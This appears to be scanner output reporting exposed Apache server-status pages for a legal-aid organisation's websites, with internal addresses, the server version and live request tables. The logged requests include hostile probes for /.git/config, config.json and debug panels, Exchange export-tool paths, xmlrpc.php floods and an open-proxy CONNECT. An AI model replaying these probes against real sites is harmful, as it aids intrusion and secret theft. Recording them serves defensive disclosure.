48-424-0/0/30619. 0.001281348700.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001281348600.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001281348500.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001281348400.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001281348300.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001281348200.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001281348100.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001281348000.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001281347900.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979e05b8a16
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 29-Oct-2025 08:10:53 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 569 Parent Server MPM Generation: 568 Server uptime: 567 days 15 hours 16 minutes 20 seconds Server load: 0.00 0.00 0.00 Total accesses: 13743075 - Total Traffic: 195.1 GB CPU Usage: u312.42 s26.92 cu0 cs0 - .000692% CPU load .28 requests/sec - 4271 B/second - 14.9 kB/request 1 requests currently being processed, 7 idle workers ______..._W..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-568244160/44/810995_ 4.35551630.00.4313417.88 130.176.208.143http/1.1intranet.atlantalegalaid.org:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-568244170/5/788043_ 1.05117200.00.2013033.34 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-568246830/13/756384_ 2.5291810.01.1812874.10 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-568244220/14/738522_ 2.784921810.00.7212348.88 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1761724953.584187984466552 4-568246910/20/719048_ 3.5992730.01.4511835.97 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 5-568246970/6/698630_ 1.204924570.00.3311527.75 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-567-0/0/659345. 9.522529700.00.0010848.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-567-0/0/634415. 21.862529800.00.0010355.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-567-0/0/602444. 16.8963517970.00.009774.46 70.132.1.135http/1.1events.alas.org:8080POST /api/graphql HTTP/1.1 9-568244270/4/582361_ 0.6560850.00.049168.36 130.176.209.181http/1.1elearning.alas.org:8080GET /lib/upgrade.txt HTTP/1.1 10-5682443223/36/513605W 2.420026.20.758720.00 130.176.208.143http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 11-567-0/0/478195. 1.2263517760.00.007883.59 70.132.1.135http/1.1events.alas.org:8080POST /graphql HTTP/1.1 12-567-0/0/414473. 3.5263517700.00.006561.63 70.132.1.135http/1.1events.alas.org:8080POST /graphql/api HTTP/1.1 13-567-0/0/328211. 1.8763517830.00.004774.13 70.132.1.135http/1.1events.alas.org:8080POST /api/gql HTTP/1.1 14-567-0/0/289254. 0.002530800.00.004298.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-567-0/0/264905. 0.002530600.00.003767.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-567-0/0/230198. 0.002530700.00.003425.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-567-0/0/167507. 0.002530500.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-567-0/0/145384. 0.002530400.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-567-0/0/137585. 0.002531800.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-567-0/0/128254. 0.002531700.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-567-0/0/116725. 0.002531600.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.002530300.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.002530000.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.002530200.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.002529900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00125645600.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00125645500.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00125645400.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00125645200.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00125645300.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00125645100.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82770813300.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00777953100.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15767765100.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0676959516620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23769595100.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00777956600.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00777956400.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32769595110080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00777956500.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00777956300.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00777956200.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00777956100.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00777956000.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00777955900.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001237189800.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001237189700.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001237189600.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001237189500.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001237189400.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001237189300.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001237189200.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001237189100.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001237189000.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001237188900.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9790d4780e4
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 26-Oct-2025 19:06:00 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 566 Parent Server MPM Generation: 565 Server uptime: 565 days 2 hours 11 minutes 26 seconds Server load: 0.00 0.00 0.00 Total accesses: 13739267 - Total Traffic: 195.0 GB CPU Usage: u401.45 s36.66 cu0 cs0 - .000897% CPU load .281 requests/sec - 4287 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _____.__.__W.................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-56516040/74/810749_ 13.224451570.01.8313407.59 3.172.35.142http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-56515280/66/787716_ 10.3991810.03.3713020.14 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-56522180/94/756098_ 10.033593030.03.8512862.57 3.172.53.49http/1.1atlantalegalaid.org:8080GET /Alvin9999/https/fanfan1.net/daohang/ HTTP/1.1 3-56515260/39/738210_ 4.6682720.01.6112336.62 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-56531490/53/718816_ 6.956071520.02.7011824.45 130.176.187.214http/1.1atlantalegalaid.org:8080GET //wp/ HTTP/1.1 5-565-0/0/698342. 5.782081100.00.0011517.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-56515380/55/659053_ 8.786491460.02.6310839.21 15.158.226.76http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1761504903.561830043792724 7-56515440/136/634211_ 10.386071580.03.1610346.11 130.176.187.230http/1.1atlantalegalaid.org:8080GET //wordpress/ HTTP/1.1 8-565-0/0/602212. 0.072081000.00.009762.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-56536110/36/582023_ 5.486494350.02.009157.05 3.172.35.142http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 10-56536160/50/513278_ 8.006081420.02.568712.44 130.176.187.246http/1.1atlantalegalaid.org:8080GET //blog/ HTTP/1.1 11-565362123/54/478016W 5.020026.21.597880.82 130.176.208.143http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 12-564-0/0/414337. 4.684632100.00.006554.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-564-0/0/328102. 1.975796900.00.004770.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-564-0/0/289105. 0.007502500.00.004293.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-562-0/0/264814. 0.5022868400.00.003766.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-562-0/0/230184. 1.9626187800.00.003424.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-563-0/0/167504. 24.2017416900.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-563-0/0/145381. 14.5517415200.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-563-0/0/137583. 19.0316578200.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-563-0/0/128229. 14.6717415000.00.001821.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-562-0/0/116723. 1.8022867900.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-562-0/0/121124. 0.0126187200.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-562-0/0/106098. 0.0826184300.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-562-0/0/108709. 0.0026188400.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-562-0/0/85998. 0.0026188300.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00103656200.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00103656100.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00103656000.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00103655800.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00103655900.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00103655700.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82748824000.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00755963700.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15745775800.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0674760576620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23747605700.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00755967200.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00755967000.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32747605710080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00755967100.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00755966900.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00755966800.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00755966700.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00755966600.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00755966500.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001215200400.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001215200300.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001215200200.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001215200100.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001215200000.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001215199900.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001215199800.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001215199700.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001215199600.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001215199500.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979bad80a4c
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 13-Aug-2023 04:13:11 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 114 Parent Server MPM Generation: 113 Server uptime: 113 days 12 hours 29 minutes 12 seconds Server load: 0.92 0.82 0.77 Total accesses: 1819710 - Total Traffic: 26.2 GB CPU Usage: u1505.92 s267.73 cu0 cs0 - .0181% CPU load .186 requests/sec - 2871 B/second - 15.1 kB/request 15 requests currently being processed, 10 idle workers KKKKKKKKKWKK_______CK___C....................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-11396479/1325/128916K 180.090050.14.871927.10 130.176.137.97http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 1-11396544/1291/126608K 173.83104.74.661977.52 70.132.4.67http/1.1picturingjustice.org:8080GET /about HTTP/1.1 2-11396597/1271/121057K 185.540013.04.751812.63 70.132.4.67http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 3-11396702/1241/121623K 164.40202.54.521781.48 70.132.4.89http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 4-11398578/590/118222K 80.230010.22.071703.09 70.132.4.67http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-11396755/1243/113265K 166.631010.44.451671.81 70.132.4.67http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 6-113986210/585/106408K 78.340013.12.041641.92 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-113989211/309/108742K 46.070014.21.041615.44 70.132.4.67http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 8-11398161/1090/100591K 161.37201.13.931628.64 70.132.4.95http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 9-113100778/8/96023W 0.000010.20.011298.62 70.132.4.67http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 10-113100833/3/87730K 0.00103.80.001355.03 70.132.4.67http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 11-113100841/2/73980K 0.55201.10.001152.86 70.132.4.95http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 12-113100930/2/75174_ 0.601550.00.011062.09 130.176.185.53http/1.1gwinnettfamilylawclinic.org:808POST //xmlrpc.php HTTP/1.1 13-113100940/3/56608_ 0.070490.00.01749.86 130.176.185.53http/1.1gwinnettfamilylawclinic.org:808POST //xmlrpc.php HTTP/1.1 14-113100990/2/44988_ 0.5906470.00.01599.46 130.176.185.44http/1.1events.atlantalegalaid.org:8080POST //xmlrpc.php HTTP/1.1 15-113101040/2/45076_ 0.051530.00.01654.37 130.176.185.53http/1.1gwinnettfamilylawclinic.org:808POST //xmlrpc.php HTTP/1.1 16-113101130/1/37024_ 0.030610.00.00542.91 130.176.185.53http/1.1gwinnettfamilylawclinic.org:808POST //xmlrpc.php HTTP/1.1 17-113101140/1/22863_ 0.020580.00.00297.61 130.176.185.53http/1.1gwinnettfamilylawclinic.org:808POST //xmlrpc.php HTTP/1.1 18-113101190/1/17602_ 0.5706640.00.00232.08 130.176.185.44http/1.1events.atlantalegalaid.org:8080POST //xmlrpc.php HTTP/1.1 19-113101201/1/15667C 0.00000.20.00250.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-11383454/1598/17568K 201.03104.313.71229.10 70.132.4.67http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 21-113101290/0/15123_ 0.79100.00.00240.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-113101320/1/14329_ 0.030640.00.00198.90 130.176.185.53http/1.1gwinnettfamilylawclinic.org:808POST //xmlrpc.php HTTP/1.1 23-113101350/0/12734_ 0.54100.00.00216.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-113101401/1/9940C 0.020634.10.00130.46 130.176.185.53http/1.1gwinnettfamilylawclinic.org:808POST //xmlrpc.php HTTP/1.1 25-113-0/0/6050. 0.60274900.00.00116.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-113-0/0/6526. 0.00275800.00.00126.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-113-0/0/5083. 0.07274800.00.0088.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-113-0/0/5575. 0.70273600.00.0076.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-113-0/0/5106. 0.70273500.00.0080.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-113-0/0/4860. 0.61275900.00.0069.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-113-0/0/5204. 0.11274100.00.0066.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-113-0/0/5540. 47.22212400.00.0087.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-113-0/0/5576. 1.25273300.00.0090.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-113-0/0/5565. 174.3248800.00.0064.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-113-0/0/4390. 0.09275700.00.0053.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-113-0/0/4709. 0.03275000.00.0081.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-113-0/0/5875. 0.64275200.00.0062.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-113-0/0/3832. 0.78273700.00.0047.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-113-0/0/5042. 0.00960500.00.0068.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-113-0/0/4676. 0.00960700.00.0042.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-113-0/0/1526. 0.00959600.00.0020.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-113-0/0/2621. 0.03959000.00.0025.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-113-0/0/1354. 0.01959300.00.0013.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-113-0/0/887. 0.00959200.00.009.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-113-0/0/1956. 0.01959400.00.0020.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-113-0/0/1010. 0.00959100.00.0010.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-113-0/0/938. 0.71846500.00.0015.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-113-0/0/1181. 0.00959500.00.0021.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-113-0/0/1211. 0.90846600.00.0011.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-113-0/0/940. 0.00958400.00.0021.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-113-0/0/852. 0.00958200.00.0011.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-113-0/0/995. 0.00958000.00.0015.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-113-0/0/837. 0.00958100.00.0014.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-113-0/0/894. 0.00958300.00.0018.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-113
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979191b7626
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 15-Apr-2023 00:04:32 UTC Restart Time: Saturday, 11-Mar-2023 06:50:09 UTC Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 34 days 17 hours 14 minutes 22 seconds Server load: 3.13 1.25 0.46 Total accesses: 772589 - Total Traffic: 24.8 GB CPU Usage: u62.13 s11.23 cu0 cs0 - .00245% CPU load .258 requests/sec - 8.7 kB/second - 33.7 kB/request 17 requests currently being processed, 67 idle workers .._K.K.__._...____._.KK_K__K..K.W_.K._.._._...__..____..______.K ..K_..__.__._K._.____.._____..__.....KK.K_K_______________C__... _........._._......... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-34-0/0/50495. 2.19600.00.001579.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-34-0/0/48806. 3.703700.00.001536.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-34134350/18/48224_ 2.284900.00.491444.05 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 3-34135593/11/46778K 0.29303.70.101483.14 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-34-0/0/47655. 0.975600.00.001591.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-34135653/14/44033K 1.33304.20.171399.95 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 6-34-0/0/44644. 0.863400.00.001335.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-34134880/13/42574_ 0.84491320.00.171308.26 15.158.15.177http/1.1survey.alas.org:8080GET / HTTP/1.1 8-34134610/15/40588_ 2.1475960.00.141269.71 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 9-34-0/0/37178. 1.401300.00.001154.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-34135660/15/34194_ 0.64451430.00.131141.54 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 11-34-0/0/31253. 0.001000.00.001077.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-34-0/0/29592. 0.10300.00.00900.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-34-0/0/23493. 0.31000.00.00856.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-34136540/5/22696_ 0.25800.00.07707.53 15.158.15.177http/1.1on.alas.org:8080GET / HTTP/1.1 15-34135970/11/20773_ 0.13890.00.05676.31 15.158.15.177http/1.1secure.alas.org:8080GET / HTTP/1.1 16-34136550/6/19806_ 0.7976220.00.10710.92 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 17-34136600/5/13147_ 0.9384610.00.14517.79 15.158.15.177http/1.1elearning.alas.org:8080GET / HTTP/1.1 18-34-0/0/11122. 0.551500.00.00444.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-34136740/5/11772_ 0.495339210.00.10454.56 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 20-34-0/0/10182. 2.01900.00.00419.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-34136754/10/10311K 0.34304.80.05386.76 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 22-34129673/101/9388K 3.66314.10.58383.68 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 23-34136800/6/8387_ 0.8676290.00.07343.73 